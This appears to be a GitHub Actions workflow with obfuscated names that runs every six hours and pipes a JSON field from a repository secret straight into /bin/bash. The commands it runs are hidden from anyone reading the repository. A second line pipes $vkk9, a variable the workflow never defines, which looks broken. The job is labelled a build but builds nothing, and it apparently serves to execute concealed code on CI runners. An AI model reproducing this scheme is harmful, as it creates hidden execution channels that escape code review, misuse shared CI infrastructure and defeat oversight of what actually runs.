name: jiashadeq
on:
  workflow_dispatch:
  schedule:
    - cron: '56 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: jiashadeq
        env:
          zbxn8: ${{ secrets.zbxn8 }}
        run: |
          echo $zbxn8 | jq -r .zc853 | /bin/bash
          echo $vkk9 | jq -r .giaj3455 | /bin/bash

